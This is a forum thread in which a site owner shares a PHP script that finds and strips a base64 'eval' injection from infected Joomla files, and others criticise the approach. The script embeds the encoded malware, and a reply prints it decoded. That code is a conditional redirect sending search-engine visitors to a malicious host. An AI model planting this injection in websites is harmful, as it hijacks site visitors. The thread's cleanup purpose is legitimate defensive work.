Beginner Php - Script To Remove Base64_Decode Hack - Small Improvements

[RandyPetersen]

I found this PHP script that checks the site and removes base64_decode based hacks. I had/have some problems with these hacks as of late. My hosting provider is working to remedy this, but this script worked awesome. First time about a week ago(I didn't have this script), I had to downloaded all my files and ran a script here to clean the files and re-uploaded them. It took forever, but this sctipt made quick work of it when I was infected with a different code the second time. I was just thinking about tweaking it a bit to help me find the next attack and for anyone else in the future. I am not a PHP coder, but have modified it a bit for my use.

 

It was detecting some files that I had that were empty and reporting that it couldn't check the files. I put the filesize>0 conditional statement in there to remedy that.

 

This is newbie stuff I am sure, so maybe someone would like to help out and make something useful.

 

List of improvements would be:

 

* Exclude the file in which this script is contained.

* Set up an Array or a separate file of known base64_decode redirect code.

* On files in which it contains a "base64_decode" command but none of the known exploits, display the next few lines of the file after the base64_decode command to see if a new exploit is being introduced.

 

<html><head><title>Find String</title></head><body>


<div style="width:500px; margin:20px; padding:20px; background:#ccc; border:#2d2d2d 1px solid;">
<p> This is currently locating the infected string </br>
All strings that match will be removed automatically for you. </br>
Credit : http://www.tahapaksu.com </p>


<p> Refresh the page after the script is done, </br>
There might be some files left, but those are not </br>
infected by this particular decode causing redirect to  </br>
costabrava.bee.pl </p>


<p>Above edit by criticalpixel.com </p>
</div>
<?php
// ini_set('max_execution_time', '0');
// ini_set('set_time_limit', '0');
find_files('.');


function find_files($seed) {
if(! is_dir($seed)) return false;
$files = array();
$dirs = array($seed);
while(NULL !== ($dir = array_pop($dirs)))
{
 if($dh = opendir($dir))
 {
  while( false !== ($file = readdir($dh)))
  {
   if($file == '.' || $file == '..') continue;
   $path = $dir . '/' . $file;
   if(is_dir($path)) {    $dirs[] = $path; }
   else { if(preg_match('/^.*\.(php[\d]?|js|txt)$/i', $path)) { check_files($path); }}
  }
  closedir($dh);
 }
}
}
function check_files($this_file) {
$str_to_find='base64_decode("'; // the string(code/text) to search for
if(!($content = file_get_contents($this_file))) 
 { 
  if(filesize($this_file)>0 )
  {
   echo("<p>Could not check $this_file</p>\n");
  }
  else
  {
  }
 }
else 
 { 
 if(stristr($content, $str_to_find)) { 
  echo("<p>$this_file -> contains $str_to_find</p>\n"); 
  $str_to_replace='eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbHBpc3R3LjRwdS5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));';
  $content = str_replace($str_to_replace,"",$content);
  file_put_contents($this_file,$content);
}}
unset($content);
}



?>
</body></html>

 

What are your thoughts? Is it worth it? What would be a command to find the filename of the current file running the script?

Setup a file with several lines or just set up an array?

Show just a few lines of a file?

 

Thanks,

Randy

[ignace]

ROFLMAO. This made me laugh really hard. So there is a script that modifies your files, to remedy this you run another script to clean them? Never taught that maybe you should solve the problem at the root?

 

How are they modifiying your files? Through FTP? Then change your password. Are they on the same shared hosting server? Leave, and find a better hosting company that actually knows what they are doing.

Edited October 28, 2012 by ignace

[RandyPetersen]

ya, I see the humor in that. Of course the root of the problem is being figured out and resolved. This is just a stop-gap until it's resolved.

Search for base64_decode hacks and you'll see its a common problem.

 

All FTPs were changed after the first attack, and I was attacked again.

I think it may be one of the 20 websites that I have under the account. Either they installed a bad component or they hacked a password. Either way, this will allow me some time as I try to resolve the problem. I am also planning on upgrading them to the latest version of joomla and components they use, but that will take time, this script has been a lifesaver.

[MDCode]

Why would you need 20 websites...

[Jessica]

Why WOULDN'T you need 20 websites?

[ignace]

All FTPs were changed after the first attack, and I was attacked again.

 

Are you sure it is done through FTP? It is possible the problem is the software: Joomla. Which plugins have you installed? Have you checked the open issues with both? Or which issues there are with your currently installed versions?

 

I think it may be one of the 20 websites that I have under the account. Either they installed a bad component or they hacked a password.

 

So, you have no clue.

[haku]

This is where a versioning system like GIT, SVN or CVS can help. If you get a bug, you wipe your entire file system clean, and re-checkout the repository. Takes no more than a few seconds.

[Monkuar]

LMFAO so you get injected with hacks probably from mysql injections, or your host is tampering your data files... and to fix this you build a script to clean them manually? LMFAO I Saved this topic as the best topic of the decade by far.

 

 

Are you a on a shared hosting account / vps? / dedi/ what?? Remedy the problem at the CORE level, no need for you to waste time doing this.

 

ALso if you're on VPS setup a cron if you wish.. lol

 

 

 

 

 

Why in the world are you replacing your values with:

 

 

 

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://lpistw.4pu.com/");
exit();
}
}
}
}
}

 

 

lmfao myspace really?

Edited October 31, 2012 by Monkuar